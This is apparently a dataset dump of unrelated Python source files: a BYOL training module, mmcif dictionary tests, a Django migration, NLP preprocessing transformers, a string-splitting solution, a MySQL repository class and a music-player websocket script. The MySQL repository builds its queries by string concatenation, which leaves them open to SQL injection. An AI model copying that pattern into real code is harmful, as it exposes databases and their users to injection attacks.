content
stringlengths
5
1.05M
import pytorch_lightning as pl import torch import torch.nn as nn import torch.nn.functional as F import torchvision.utils as vutils from torchvision import models, transforms from torch.optim import Adam from torchsummary import summary import numpy as np from byol_pytorch import BYOL class ContrastiveLearner(pl.LightningModule): def __init__(self, net, config): super().__init__() self.config = config self.BYOL = BYOL(net=net, image_size=self.config['exp_params']['image_size'], hidden_layer=self.config['model_params']['hidden_layer'], projection_size=self.config['model_params']['projection_size'], projection_hidden_size=self.config['model_params']['projection_hidden_size'], moving_average_decay=self.config['model_params']['moving_average_decay'], use_momentum=True) def forward(self, x): return self.BYOL(x) def configure_optimizers(self): return Adam(self.parameters(), lr=self.config['exp_params']['LR'], betas=(self.config['exp_params']['beta1'], self.config['exp_params']['beta2'])) def on_before_zero_grad(self, _): if self.BYOL.use_momentum: self.BYOL.update_moving_average() def training_step(self, batch, batch_idx): loss = self.forward(batch) self.log('loss', loss, on_step=True, prog_bar=False) return {"loss": loss} ''' def validation_step(self, batch, batch_idx): loss = self.forward(batch) # save input and output images at beginning of epoch if batch_idx == 0: self.save_images(x, output, "val_input_output") return {"val_loss": loss} def validation_epoch_end(self, outputs): avg_loss = torch.stack([x["val_loss"] for x in outputs]).mean() self.log('avg_val_loss', avg_loss, on_epoch=True, prog_bar=True) def save_images(self, x, output, name, n=16): """ Saves a plot of n images from input and output batch """ # make grids and save to logger grid_top = vutils.make_grid(x[:n,:,:,:], nrow=n) grid_bottom = vutils.make_grid(output[:n,:,:,:], nrow=n) grid = torch.cat((grid_top, grid_bottom), 1) self.logger.experiment.add_image(name, grid, self.current_epoch) '''
## # File: DictionaryApiTests.py # Author: jdw # Date: 8-Mar-2018 # Version: 0.001 ## """ Tests cases for Dictionary API. """ from __future__ import absolute_import, print_function import json import logging import os import pprint import sys import time import unittest from mmcif.api.DictionaryApi import DictionaryApi from mmcif.api.PdbxContainers import CifName from mmcif.io.IoAdapterPy import IoAdapterPy as IoAdapter HERE = os.path.abspath(os.path.dirname(__file__)) TOPDIR = os.path.dirname(os.path.dirname(HERE)) try: from mmcif import __version__ except ImportError: sys.path.insert(0, TOPDIR) from mmcif import __version__ __docformat__ = "google en" __author__ = "John Westbrook" __email__ = "jwest@rcsb.rutgers.edu" __license__ = "Apache 2.0" logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s]-%(module)s.%(funcName)s: %(message)s") logger = logging.getLogger() logger.setLevel(logging.INFO) class DictionaryApiTests(unittest.TestCase): def setUp(self): self.__lfh = sys.stderr self.__verbose = False self.__pathPdbxDictionary = os.path.join(HERE, "data", "mmcif_pdbx_v5_next.dic") self.__pathPdbxDictionaryExtension = os.path.join(HERE, "data", "pdbx-dictionary-extensions-examples.dic") self.__containerList = None self.__startTime = time.time() logger.debug("Running tests on version %s", __version__) logger.debug("Starting %s at %s", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime())) def tearDown(self): endTime = time.time() logger.debug("Completed %s at %s (%.4f seconds)", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()), endTime - self.__startTime) # def testExtensions(self): """Test case - condition extensions""" try: myIo = IoAdapter(raiseExceptions=True) self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary) self.__containerList.extend(myIo.readFile(inputFilePath=self.__pathPdbxDictionaryExtension)) dApi = DictionaryApi(containerList=self.__containerList, consolidate=True) tD = dApi.getItemValueConditionDict() logger.debug("tD \n%s", pprint.pformat(tD)) self.assertGreaterEqual(len(tD), 2) tD = dApi.getComparisonOperatorDict() logger.debug("tD \n%s", pprint.pformat(tD)) self.assertGreaterEqual(len(tD), 5) tL = dApi.getComparisonOperators() logger.debug("tL %r", tL) self.assertGreaterEqual(len(tL), 5) # tD = dApi.getItemLinkedConditions() logger.debug("tD \n%s", pprint.pformat(tD)) self.assertGreaterEqual(len(tD), 1) except Exception as e: logger.exception("Failing with %s", str(e)) self.fail() def testExtendedEnums(self): """Test case - to verify extended enums -""" try: myIo = IoAdapter(raiseExceptions=True) self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary) dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose) # eList = dApi.getEnumListWithFullDetails(category="chem_comp", attribute="mon_nstd_flag") logger.info("Item Enum list sorted %r\n", eList) self.assertGreaterEqual(len(eList), 4) eList = dApi.getEnumListWithFullDetails(category="atom_site", attribute="refinement_flags_occupancy") logger.info("Item Enum list sorted %r\n", eList) self.assertGreaterEqual(len(eList), 1) # except Exception as e: logger.exception("Failing with %s", str(e)) self.fail() def testDumpEnums(self): """Test case - to verify enum ordering -""" try: myIo = IoAdapter(raiseExceptions=True) self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary) dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose) # eList = dApi.getEnumListAlt(category="pdbx_audit_support", attribute="country") logger.debug("Item %s Enum list sorted %r\n", "country", eList) eList = dApi.getEnumListAlt(category="pdbx_audit_support", attribute="country", sortFlag=False) logger.debug("Item %s Enum list unsorted %r\n", "country", eList) eList = dApi.getEnumListAltWithDetail(category="pdbx_audit_support", attribute="country") logger.debug("Item %s Enum with detail list %r\n", "country", eList) self.assertGreater(len(eList), 100) except Exception as e: logger.exception("Failing with %s", str(e)) self.fail() def testDumpIndex(self): """Test case - dump methods for dictionary metadata""" try: myIo = IoAdapter(raiseExceptions=True) self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary) dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose) if self.__verbose: dApi.dumpCategoryIndex(fh=self.__lfh) logger.debug("Index = %r\n", dApi.getItemNameList("pdbx_nmr_spectral_dim")) logger.debug("Index = %r\n", dApi.getAttributeNameList("pdbx_nmr_spectral_dim")) catIndex = dApi.getCategoryIndex() logger.debug("Index = %r\n", catIndex["pdbx_nmr_spectral_dim"]) self.assertIsNotNone(catIndex["pdbx_nmr_spectral_dim"]) except Exception as e: logger.exception("Failing with %s", str(e)) self.fail() def testDumpDictionary(self): """Test case - dump methods for dictionary metadata""" try: myIo = IoAdapter(raiseExceptions=True) self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary) dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose) # dApi.dumpCategoryIndex(fh=self.__lfh) # dApi.dumpEnumFeatures(fh=self.__lfh) # dApi.dumpFeatures(fh=self.__lfh) # dApi.dumpMethods(fh=self.__lfh) logger.debug("+++++++++++++++++++++++++++++++++++++++++++++++++++++++\n") groupList = dApi.getCategoryGroups() logger.debug("groupList %s\n", groupList) for group in groupList: logger.debug("Group %s category list %s\n", group, dApi.getCategoryGroupCategories(groupName=group)) self.assertGreater(len(groupList), 10) except Exception as e: logger.exception("Failing with %s", str(e)) self.fail() def testConsolidateDictionary(self): """Test case - dump methods for dictionary metadata""" try: myIo = IoAdapter(raiseExceptions=True) self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary) dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, expandItemLinked=False, verbose=self.__verbose) for itemName in [ "_entity.id", "_entity_poly_seq.num", "_atom_site.label_asym_id", "_struct_asym.id", "_chem_comp.id", "chem_comp_atom.comp_id", "chem_comp_bond.comp_id", ]: categoryName = CifName.categoryPart(itemName) attributeName = CifName.attributePart(itemName) logger.debug("Full parent list for %s : %s\n", itemName, dApi.getFullParentList(categoryName, attributeName)) logger.debug("Full child list for %s : %s\n", itemName, dApi.getFullChildList(categoryName, attributeName)) logger.debug("Ultimate parent for %s : %s\n", itemName, dApi.getUltimateParent(categoryName, attributeName)) logger.debug("Type code for %s : %s\n", itemName, dApi.getTypeCode(categoryName, attributeName)) self.assertIsNotNone(dApi.getTypeCode(categoryName, attributeName)) except Exception as e: logger.exception("Failing with %s", str(e)) self.fail() def testGetAdjacentCategories(self): """Test case -""" try: myIo = IoAdapter(raiseExceptions=True) self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary) dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose) cList = dApi.getCategoryList() cI = {} for cV in cList: chL = dApi.getChildCategories(cV) pL = dApi.getParentCategories(cV) for ch in chL: if (ch, cV) not in cI: cI[(ch, cV)] = 1 else: cI[(ch, cV)] += 1 for pV in pL: if (cV, pV) not in cI: cI[(cV, pV)] = 1 else: cI[(cV, pV)] += 1 linkL = [] for tup in cI: dD = {"source": tup[0], "target": tup[1], "type": "link"} linkL.append(dD) if self.__verbose: print(json.dumps(linkL, sort_keys=True, indent=4, separators=(",", ": "))) self.assertGreater(len(linkL), 50) except Exception as e: logger.exception("Failing with %s", str(e)) self.fail() def suiteIndexTests(): suiteSelect = unittest.TestSuite() suiteSelect.addTest(DictionaryApiTests("testDumpIndex")) return suiteSelect def suiteDictionaryApiTests(): suiteSelect = unittest.TestSuite() suiteSelect.addTest(DictionaryApiTests("testDumpDictionary")) return suiteSelect def suiteConsolidateTests(): suiteSelect = unittest.TestSuite() suiteSelect.addTest(DictionaryApiTests("testConsolidateDictionary")) return suiteSelect def suiteAdjacentTests(): suiteSelect = unittest.TestSuite() suiteSelect.addTest(DictionaryApiTests("testGetAdjacentCategories")) return suiteSelect def suiteDictionaryApiEnumTests(): suiteSelect = unittest.TestSuite() suiteSelect.addTest(DictionaryApiTests("testDumpEnums")) return suiteSelect if __name__ == "__main__": mySuite = suiteDictionaryApiTests() unittest.TextTestRunner(verbosity=2).run(mySuite) mySuite = suiteConsolidateTests() unittest.TextTestRunner(verbosity=2).run(mySuite) mySuite = suiteAdjacentTests() unittest.TextTestRunner(verbosity=2).run(mySuite) mySuite = suiteDictionaryApiEnumTests() unittest.TextTestRunner(verbosity=2).run(mySuite) mySuite = suiteIndexTests() unittest.TextTestRunner(verbosity=2).run(mySuite)
# Generated by Django 2.2.9 on 2020-02-19 21:39 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ("course_flow", "0001_initial"), ] operations = [ migrations.AlterModelOptions( name="activity", options={ "verbose_name": "Activity", "verbose_name_plural": "Activities", }, ), migrations.AlterModelOptions( name="componentprogram", options={ "verbose_name": "Component-Program Link", "verbose_name_plural": "Component-Program Links", }, ), migrations.AlterModelOptions( name="componentweek", options={ "verbose_name": "Component-Week Link", "verbose_name_plural": "Component-Week Links", }, ), migrations.AlterModelOptions( name="nodestrategy", options={ "verbose_name": "Node-Strategy Link", "verbose_name_plural": "Node-Strategy Links", }, ), migrations.AlterModelOptions( name="outcome", options={ "verbose_name": "Outcome", "verbose_name_plural": "Outcomes", }, ), migrations.AlterModelOptions( name="outcomeactivity", options={ "verbose_name": "Outcome-Activity Link", "verbose_name_plural": "Outcome-Activity Links", }, ), migrations.AlterModelOptions( name="outcomeartifact", options={ "verbose_name": "Outcome-Artifact Link", "verbose_name_plural": "Outcome-Artifact Links", }, ), migrations.AlterModelOptions( name="outcomeassessment", options={ "verbose_name": "Outcome-Assessment Link", "verbose_name_plural": "Outcome-Assessment Links", }, ), migrations.AlterModelOptions( name="outcomecourse", options={ "verbose_name": "Outcome-Course Link", "verbose_name_plural": "Outcome-Course Links", }, ), migrations.AlterModelOptions( name="outcomenode", options={ "verbose_name": "Outcome-Node Link", "verbose_name_plural": "Outcome-Node Links", }, ), migrations.AlterModelOptions( name="outcomepreparation", options={ "verbose_name": "Outcome-Preparation Link", "verbose_name_plural": "Outcome-Preparation Links", }, ), migrations.AlterModelOptions( name="outcomeprogram", options={ "verbose_name": "Outcome-Program Link", "verbose_name_plural": "Outcome-Program Links", }, ), migrations.AlterModelOptions( name="outcomestrategy", options={ "verbose_name": "Outcome-Strategy Link", "verbose_name_plural": "Outcome-Strategy Links", }, ), migrations.AlterModelOptions( name="outcomeweek", options={ "verbose_name": "Outcome-Week Link", "verbose_name_plural": "Outcome-Week Links", }, ), migrations.AlterModelOptions( name="strategy", options={ "verbose_name": "Strategy", "verbose_name_plural": "Strategies", }, ), migrations.AlterModelOptions( name="strategyactivity", options={ "verbose_name": "Strategy-Activity Link", "verbose_name_plural": "Strategy-Activity Links", }, ), migrations.AlterModelOptions( name="weekcourse", options={ "verbose_name": "Week-Course Link", "verbose_name_plural": "Week-Course Links", }, ), migrations.AddField( model_name="activity", name="static", field=models.BooleanField(default=False), ), migrations.AddField( model_name="course", name="static", field=models.BooleanField(default=False), ), migrations.AlterField( model_name="node", name="author", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="author", to=settings.AUTH_USER_MODEL, ), ), migrations.CreateModel( name="NodeCompletionStatus", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("is_completed", models.BooleanField(default=False)), ( "node", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="course_flow.Node", ), ), ( "student", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, ), ), ], options={ "verbose_name": "Node Completion Status", "verbose_name_plural": "Node Completion Statuses", }, ), migrations.CreateModel( name="ComponentCompletionStatus", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("is_completed", models.BooleanField(default=False)), ( "component", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="course_flow.Component", ), ), ( "student", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, ), ), ], options={ "verbose_name": "Component Completion Status", "verbose_name_plural": "Component Completion Statuses", }, ), migrations.AddField( model_name="node", name="students", field=models.ManyToManyField( blank=True, related_name="students", through="course_flow.NodeCompletionStatus", to=settings.AUTH_USER_MODEL, ), ), ]
#!/usr/bin/env python # Copyright 2021 Marcelo Sanches # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Attributions # # The expand_contractions function and WordCounterToVectorTransformer # class are verbatim copies from Dipanjan Sarkar and Aurelien Geron's # work. # # The other three classes were the focus of my efforts, yet were heavily # adapted from A. Geron's original class in his famous classification # notebook from his book: Hands-On Machine Learning with Scikit-Learn, # Keras, and TensorFlow published by O'Reilly. # # See code for specific attributions and links. import re import os import time import json import numpy as np import pandas as pd import urlextract from html import unescape from nltk.util import ngrams from nltk.corpus import stopwords from nltk.tokenize import word_tokenize from nltk.stem import WordNetLemmatizer from scipy.sparse import csr_matrix from collections import Counter from sklearn.base import BaseEstimator, TransformerMixin # The expand_contractions function was written by Dipanjan Sarkar, # Data Science Lead at Applied Materials, kdnuggets.com contributor, # author of Practical Machine Learning with Python (Apache 2.0 License) # https://github.com/dipanjanS/practical-machine-learning-with-python # https://www.kdnuggets.com/2018/08/practitioners-guide-processing-understanding-text-2.html # load contractions map with open("contractions_map.json") as f: contractions_map = json.load(f) def expand_contractions(text, contractions_map): pattern = re.compile('({})'.format('|'.join(contractions_map.keys())), flags=re.IGNORECASE|re.DOTALL) def expand_match(contraction): match = contraction.group(0) first_char = match[0] expanded_contraction = contractions_map.get(match)\ if contractions_map.get(match)\ else contractions_map.get(match.lower()) expanded_contraction = first_char+expanded_contraction[1:] return expanded_contraction expanded_text = pattern.sub(expand_match, text) expanded_text = re.sub("'", "", expanded_text) return expanded_text def is_ascii(doc): try: doc.encode(encoding='utf-8').decode('ascii') except UnicodeDecodeError: return False else: return True # instantiate url extractor and lemmatizer url_extractor = urlextract.URLExtract() lemmatizer = WordNetLemmatizer() # The three Word-to-Counter transformer classes were heavily adapted from # A. Geron's classificaion notebook: # In [152]: class EmailToWordCounterTransformer # https://github.com/ageron/handson-ml/blob/master/03_classification.ipynb class DocumentToWordCounterTransformer(BaseEstimator, TransformerMixin): def __init__(self, expand_contractions=True, lower_case=True, replace_usernames=True, unescape_html=True, replace_urls=True, replace_numbers=True, remove_junk=True, remove_punctuation=True, replace_emojis=True, replace_nonascii=True, remove_stopwords=True, lemmatization=True): self.expand_contractions = expand_contractions self.lower_case = lower_case self.replace_usernames = replace_usernames self.unescape_html = unescape_html self.replace_urls = replace_urls self.replace_numbers = replace_numbers self.remove_junk = remove_junk self.remove_punctuation = remove_punctuation self.replace_emojis = replace_emojis self.replace_nonascii = replace_nonascii self.remove_stopwords = remove_stopwords self.lemmatization = lemmatization def fit(self, X, y=None): return self def transform(self, X, y=None): X_transformed = [] for doc in X: if self.lower_case: doc = doc.lower() if self.expand_contractions and contractions_map is not None: doc = expand_contractions(doc, contractions_map) if self.replace_usernames: doc = re.sub(r'^@([^\s]+)',' USR ', doc) if self.unescape_html: doc = unescape(doc) if self.replace_urls and url_extractor is not None: urls = list(set(url_extractor.find_urls(doc))) urls.sort(key=lambda url: len(url), reverse=True) for url in urls: doc = doc.replace(url, ' URL ') if self.replace_numbers: doc = re.sub(r'\d+(?:\.\d*(?:[eE]\d+))?', ' NUM ', doc) if self.remove_punctuation: doc = re.sub(r'\W+', ' ', doc, flags=re.M) if self.remove_junk: pattern = r'\¥|\â|\«|\»|\Ñ|\Ð|\¼|\½|\¾|\¿|\x82\ |\x83|\x84|\x85|\x86|\x87|\x88|\x89|\ |\x8a|\x8b|\x8c|\x8d|\x8e|\°|\µ|\´|\º|\¹|\³' doc = re.sub(pattern,'', doc) if self.replace_emojis: doc = re.sub(r'[^\x00-\x7F]+', ' EMOJI ', doc) if self.replace_nonascii: if is_ascii(doc) == False: doc = ' NONASCII ' word_counts = Counter(doc.split()) if self.remove_stopwords: # 25 semantically non-selective words from the Reuters-RCV1 dataset stop_words = ['a','an','and','are','as','at','be','by','for','from', 'has','he','in','is','it','its','of','on','that','the', 'to','was','were','will','with'] for word in stop_words: try: word_counts.pop(word) except KeyError: continue if self.lemmatization and lemmatizer is not None: lemmatized_word_counts = Counter() for word, count in word_counts.items(): lemmatized_word = lemmatizer.lemmatize(word) lemmatized_word_counts[lemmatized_word] += count word_counts = lemmatized_word_counts X_transformed.append(word_counts) return np.array(X_transformed) class DocumentToBigramCounterTransformer(BaseEstimator, TransformerMixin): def __init__(self, expand_contractions=True, lower_case=True, replace_usernames=True, unescape_html=True, replace_urls=True, replace_numbers=True, remove_junk=True, remove_punctuation=True, replace_emojis=True, replace_nonascii=True, remove_stopwords=True, lemmatization=True, bigrams=True): self.expand_contractions = expand_contractions self.lower_case = lower_case self.replace_usernames = replace_usernames self.unescape_html = unescape_html self.replace_urls = replace_urls self.replace_numbers = replace_numbers self.remove_junk = remove_junk self.remove_punctuation = remove_punctuation self.replace_emojis = replace_emojis self.replace_nonascii = replace_nonascii self.remove_stopwords = remove_stopwords self.lemmatization = lemmatization self.bigrams = bigrams def fit(self, X, y=None): return self def transform(self, X, y=None): X_transformed = [] for doc in X: if self.lower_case: doc = doc.lower() if self.expand_contractions and contractions_map is not None: doc = expand_contractions(doc, contractions_map) if self.replace_usernames: doc = re.sub(r'^@([^\s]+)',' USR ', doc) if self.unescape_html: doc = unescape(doc) if self.replace_urls and url_extractor is not None: urls = list(set(url_extractor.find_urls(doc))) urls.sort(key=lambda url: len(url), reverse=True) for url in urls: doc = doc.replace(url, ' URL ') if self.replace_numbers: doc = re.sub(r'\d+(?:\.\d*(?:[eE]\d+))?', ' NUM ', doc) if self.remove_punctuation: doc = re.sub(r'\W+', ' ', doc, flags=re.M) if self.remove_junk: pattern = r'\¥|\â|\«|\»|\Ñ|\Ð|\¼|\½|\¾|\¿|\x82\ |\x83|\x84|\x85|\x86|\x87|\x88|\x89|\ |\x8a|\x8b|\x8c|\x8d|\x8e|\°|\µ|\´|\º|\¹|\³' doc = re.sub(pattern,'', doc) if self.replace_emojis: doc = re.sub(r'[^\x00-\x7F]+', ' EMOJI ', doc) if self.replace_nonascii: if is_ascii(doc) == False: doc = ' NONASCII ' # tokenize tokens = doc.split() if self.remove_stopwords: stop_words = ['a','an','and','are','as','at','be','by','for','from', 'has','he','in','is','it','its','of','on','that','the', 'to','was','were','will','with'] tokens = [t for t in tokens if t not in stop_words] if self.lemmatization and lemmatizer is not None: tokens = [lemmatizer.lemmatize(t) for t in tokens] if self.bigrams: bigrams = ngrams(word_tokenize(doc), 2) bigrams = ['_'.join(grams) for grams in bigrams] tokens = [*tokens, *bigrams] # include counts tokens_counts = Counter(tokens) # append to list X_transformed.append(tokens_counts) return np.array(X_transformed) class DocumentToNgramCounterTransformer(BaseEstimator, TransformerMixin): def __init__(self, expand_contractions=True, lower_case=True, replace_usernames=True, unescape_html=True, replace_urls=True, replace_numbers=True, remove_junk=True, remove_punctuation=True, replace_emojis=True, replace_nonascii=True, remove_stopwords=True, lemmatization=True, n_grams=2 # defaults to bigram ): self.expand_contractions = expand_contractions self.lower_case = lower_case self.replace_usernames = replace_usernames self.unescape_html = unescape_html self.replace_urls = replace_urls self.replace_numbers = replace_numbers self.remove_junk = remove_junk self.remove_punctuation = remove_punctuation self.replace_emojis = replace_emojis self.replace_nonascii = replace_nonascii self.remove_stopwords = remove_stopwords self.lemmatization = lemmatization self.n_grams = n_grams def fit(self, X, y=None): return self def transform(self, X, y=None): X_transformed = [] for doc in X: if self.lower_case: doc = doc.lower() if self.expand_contractions and contractions_map is not None: doc = expand_contractions(doc, contractions_map) if self.replace_usernames: doc = re.sub(r'^@([^\s]+)',' USR ', doc) if self.unescape_html: doc = unescape(doc) if self.replace_urls and url_extractor is not None: urls = list(set(url_extractor.find_urls(doc))) urls.sort(key=lambda url: len(url), reverse=True) for url in urls: doc = doc.replace(url, ' URL ') if self.replace_numbers: doc = re.sub(r'\d+(?:\.\d*(?:[eE]\d+))?', ' NUM ', doc) if self.remove_punctuation: doc = re.sub(r'\W+', ' ', doc, flags=re.M) if self.remove_junk: pattern = r'\¥|\â|\«|\»|\Ñ|\Ð|\¼|\½|\¾|\¿|\x82\ |\x83|\x84|\x85|\x86|\x87|\x88|\x89|\ |\x8a|\x8b|\x8c|\x8d|\x8e|\°|\µ|\´|\º|\¹|\³' doc = re.sub(pattern,'', doc) if self.replace_emojis: doc = re.sub(r'[^\x00-\x7F]+', ' EMOJI ', doc) if self.replace_nonascii: if is_ascii(doc) == False: doc = ' NONASCII ' # tokenize tokens = doc.split() if self.remove_stopwords: stop_words = ['a','an','and','are','as','at','be','by','for','from', 'has','he','in','is','it','its','of','on','that','the', 'to','was','were','will','with'] tokens = [t for t in tokens if t not in stop_words] if self.lemmatization and lemmatizer is not None: tokens = [lemmatizer.lemmatize(t) for t in tokens] if self.n_grams: for i in range(2, self.n_grams+1): # fix doubling of unigrams grams = ngrams(word_tokenize(doc), i) grams = ['_'.join(gram) for gram in grams] tokens = [*tokens, *grams] # include counts tokens_counts = Counter(tokens) # append to list X_transformed.append(tokens_counts) return np.array(X_transformed) # The WordCounterToVectorTransformer transformer class is a verbatim copy from # A. Geron's classificaion notebook: # In [154]: # https://github.com/ageron/handson-ml/blob/master/03_classification.ipynb class WordCounterToVectorTransformer(BaseEstimator, TransformerMixin): def __init__(self, vocabulary_size=1000): self.vocabulary_size = vocabulary_size def fit(self, X, y=None): total_count = Counter() for word_count in X: for word, count in word_count.items(): total_count[word] += min(count, 10) most_common = total_count.most_common()[:self.vocabulary_size] self.most_common_ = most_common self.vocabulary_ = {word: index + 1 for index, (word, count) in enumerate(most_common)} return self def transform(self, X, y=None): rows = [] cols = [] data = [] for row, word_count in enumerate(X): for word, count in word_count.items(): rows.append(row) cols.append(self.vocabulary_.get(word, 0)) data.append(count) return csr_matrix((data, (rows, cols)), shape=(len(X), self.vocabulary_size + 1))
class Solution: """ Time Complexity: O(N) Space Complexity: O(1) """ def balanced_string_split(self, s: str) -> int: # initialize variables L_count, R_count = 0, 0 balanced_substring_count = 0 # parse the string for char in s: # update the number of Ls and the number of Rs so far if char == 'L': L_count += 1 elif char == 'R': R_count += 1 # if the string is balanced, increment the balanced substrings count and reset the counters if L_count == R_count: balanced_substring_count += 1 L_count, R_count = 0, 0 return balanced_substring_count
import mysql.connector from Repositories.BaseRepository import Repository from mysql.connector import errorcode class SqlRepo(Repository): ''' A generic class for a repository for a given class ''' def __init__(self, config, objFromSql, objToSql, db, db_params): ''' The constructor of the Repository class :param fileName: the location of the file we want to read from :param name: the name of the repository ''' super().__init__() self.__config = config self.__objFromSql = objFromSql self.__objToSql = objToSql self.__db = db self.__db_params = db_params def getItemById(self, itemId): command = "SELECT * FROM " + self.__db + " where id = " + str(itemId) try: cnx = mysql.connector.connect(**self.__config) cursor = cnx.cursor() cursor.execute(command) data = cursor.fetchall() cnx.commit() if len(data) > 0: return self.__objFromSql(*data[0]) return False except mysql.connector.Error as err: if err.errno == errorcode.ER_ACCESS_DENIED_ERROR: raise ValueError("Something is wrong with your user name or password") elif err.errno == errorcode.ER_BAD_DB_ERROR: raise ValueError("Database does not exist") else: pass else: cnx.close() def executeSqlCommand(self, command): try: cnx = mysql.connector.connect(**self.__config) cursor = cnx.cursor() cursor.execute(command) data = cursor.fetchall() cnx.commit() return self.__objFromSql(*data[0]) except mysql.connector.Error as err: if err.errno == errorcode.ER_ACCESS_DENIED_ERROR: raise ValueError("Something is wrong with your user name or password") elif err.errno == errorcode.ER_BAD_DB_ERROR: raise ValueError("Database does not exist") else: pass else: cnx.close() def getAllLines(self): ''' A function that returns all the lines from file :return: a list of lists of form (*params) where params are the attributes of the given class ''' command = "SELECT * from " + self.__db try: cnx = mysql.connector.connect(**self.__config) cursor = cnx.cursor() cursor.execute(command) data = cursor.fetchall() cnx.commit() return list(map(lambda x: self.__objFromSql(*x), data)) except mysql.connector.Error as err: if err.errno == errorcode.ER_ACCESS_DENIED_ERROR: raise ValueError("Something is wrong with your user name or password") elif err.errno == errorcode.ER_BAD_DB_ERROR: raise ValueError("Database does not exist") else: raise ValueError(err) else: cnx.close() def createItem(self, item): ''' Create a new item in the repository and adds it to the file as a new line :param item: object - the item we want to add in the repository :return: returns True if there wasn't any errors and we successfully added the new item ''' if self.getItemById(item) is not None: raise ValueError("The given id is l") command = "INSERT INTO " + self.__db + self.__db_params + " Values(" item = self.__objToSql(item) sqlItem = "" for i in item: if item.index(i) != len(item) - 1: if isinstance(i, int): sqlItem += '%s, ' % i else: sqlItem += "'%s', " % (i) else: sqlItem += "'%s'" % (i) command = command + sqlItem + ");" try: cnx = mysql.connector.connect(**self.__config) cursor = cnx.cursor() cursor.execute(command) cnx.commit() return True except mysql.connector.Error as err: if err.errno == errorcode.ER_ACCESS_DENIED_ERROR: raise ValueError("Something is wrong with your user name or password") elif err.errno == errorcode.ER_BAD_DB_ERROR: raise ValueError("Database does not exist") else: print(err) pass else: cnx.close() return True def updateItemById(self, itemId, item): ''' A function that updates an item from the repository by a given id :param itemId: the id of the item we want to modify :param item: the item with the new given properties :return: returns True if there wasn't any errors and the item was updated with success ''' if self.getItemById(itemId) is False: return False self.deleteItemById(itemId) self.createItem(item) return True def deleteItemById(self, itemId): ''' A functions that deletes an item by a given id :param itemId: the item's id we want to delete :return: True, if there wasn't any errors and the item was successfully deleted ''' command = "Delete from " + self.__db + " where id= " + str(itemId) try: cnx = mysql.connector.connect(**self.__config) cursor = cnx.cursor() cursor.execute(command) cnx.commit() return True except mysql.connector.Error as err: if err.errno == errorcode.ER_ACCESS_DENIED_ERROR: raise ValueError("Something is wrong with your user name or password") elif err.errno == errorcode.ER_BAD_DB_ERROR: raise ValueError("Database does not exist") else: raise ValueError(str(err)) else: cnx.close() def __str__(self): return Repository.__str__(self)
"""DjAI Pre-Trained Torch Vision Model classes."""
#!/usr/bin/python import argparse import json import logging import signal import sys import time import websocket logger = logging.getLogger(__name__) def signal_handler(sig, frame): logger.debug('Received signal to stop, exiting') sys.stdout.write('\n') sys.stdout.flush() sys.exit(0) # Global player state state = { 'playState': False, } channels = { 'playState': (lambda x: state.update({'playState': x['payload']})), 'track': (lambda x: state.update(x['payload'])), 'shuffle': (lambda x: state.update({'shuffle': x['payload']})), 'repeat': (lambda x: state.update({'repeat': x['payload']})), 'time': (lambda x: state.update(x['payload'])), } def on_message(ws, message): obj = json.loads(message) logger.info('Received new metadata:' + obj['channel']) clbk = channels.get(obj['channel'], lambda x: logger.error('Unexpected message from GPMDP: ' + x['channel'])) clbk(obj) write_state() def on_error(ws, error): print(error) def on_close(ws): logger.info('Socket Closed') write_output(' Disconnected') def write_state(): print(state) play = state['repeat'] == 'SINGLE_REPEAT' and '' or (state['shuffle'] == 'ALL_SHUFFLE' and '' or '') args = [ state['playState'] and play or '', ' | ', state['artist'] or 'No artist', ' | ', state['title'] or 'No music' ] text = ''.join(args) write_output(text) def write_output(text): logger.info('Writing output') output = {'text': text, 'class': 'custom-gpmdp', 'alt': 'Google Play Music Daemon'} sys.stdout.write(json.dumps(output) + '\n') sys.stdout.flush() def parse_arguments(): parser = argparse.ArgumentParser() # Increase verbosity with every occurence of -v parser.add_argument('-v', '--verbose', action='count', default=0) # Define for which player we're listening # parser.add_argument('--player') return parser.parse_args() def main(): arguments = parse_arguments() # Initialize logging logging.basicConfig(stream=sys.stderr, level=logging.DEBUG, format='%(name)s %(levelname)s %(message)s') # Logging is set by default to WARN and higher. # With every occurrence of -v it's lowered by one logger.setLevel(max((3 - arguments.verbose) * 10, 0)) # Log the sent command line arguments logger.debug('Arguments received {}'.format(vars(arguments))) signal.signal(signal.SIGINT, signal_handler) signal.signal(signal.SIGTERM, signal_handler) websocket.enableTrace(True) ws = websocket.WebSocketApp("ws://localhost:5672/", on_message=on_message, on_error=on_error, on_close=on_close) ws.run_forever() if __name__ == "__main__": main()
